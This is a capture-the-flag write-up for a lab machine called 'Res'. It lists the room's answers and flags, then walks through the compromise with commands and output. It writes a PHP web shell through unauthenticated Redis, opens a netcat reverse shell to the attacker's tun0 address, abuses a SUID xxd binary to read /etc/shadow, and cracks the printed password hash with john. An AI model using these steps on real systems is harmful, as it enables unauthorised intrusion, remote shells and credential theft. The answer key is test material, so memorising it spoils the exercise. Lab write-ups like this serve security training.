RES room


ip address:10.10.233.175

Q: How many ports are open? A: 2

Q: What's is the database management system installed on the server? A: redis

Q: What port is the database management system running on? A: 6379

Q: What's is the version of management system installed on the server? A: 6.0.7

Q: Compromise the machine and locate user.txt  A: thm{red1s_rce_w1thout_credent1als}

Q: What is the local user account password? A: beautiful1

Q: Escalate privileges and obtain root.txt  A: thm{xxd_pr1v_escalat1on}


Nmap:

PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 63
6379/tcp open  redis   syn-ack ttl 63


PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   syn-ack Redis key-value store 6.0.7



Gobuster: 
/server-status (Status: 403)

found redis dbms
redis-cli -h ip
>info

How to compromise redis:
Info from here. You must know the path of the Web site folder:
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK

change the directory to /var/www/html

change test value to: set test "<?php system($_GET['cmd']); ?>"

go to browser and navigate to ip/redis.php?cmd=cd /home/vianka ;cat user.txt in order to get the ser flag :thm{red1s_rce_w1thout_credent1als}

OBTAIN  a reverse shell using :http://10.10.233.175/redis.php?cmd=nc -e /bin/sh [IP tun0] 4444

search for suid files:
find / -perm -u=s 2>/dev/null

we find that xxd has the suid bit set

LFILE=/etc/shadow
xxd "$LFILE" | xxd -r

ww-data@ubuntu:/etc$ xxd "$LFILE" | xxd -r                                                                                                                                       
xxd "$LFILE" | xxd -r                                                                                                                                                             
root:!:18507:0:99999:7:::                                                                                                                                                         
daemon:*:17953:0:99999:7:::                                                                                                                                                       
bin:*:17953:0:99999:7:::                                                                                                                                                          
sys:*:17953:0:99999:7:::                                                                                                                                                          
sync:*:17953:0:99999:7:::                                                                                                                                                         
games:*:17953:0:99999:7:::                                                                                                                                                        
man:*:17953:0:99999:7:::                                                                                                                                                          
lp:*:17953:0:99999:7:::                                                                                                                                                           
mail:*:17953:0:99999:7:::                                                                                                                                                          
news:*:17953:0:99999:7:::                                                                                                                                                            
uucp:*:17953:0:99999:7:::                                                                                                                                                            
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::


read the etc/passwd file 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
vianka:x:1000:1000:Res,,,:/home/vianka:/bin/bash

read the root.txt file with xxd


get the password of vianka user:

save shadow and passwd file (leave only vianka line in the files)

$ sudo unshadow passwd shados > hash

$john hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
beautiful1       (vianka)     
1g 0:00:00:03 DONE 2/3 (2022-08-10 10:18) 0.2631g/s 4186p/s 4186c/s 4186C/s maryjane1..garfield1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

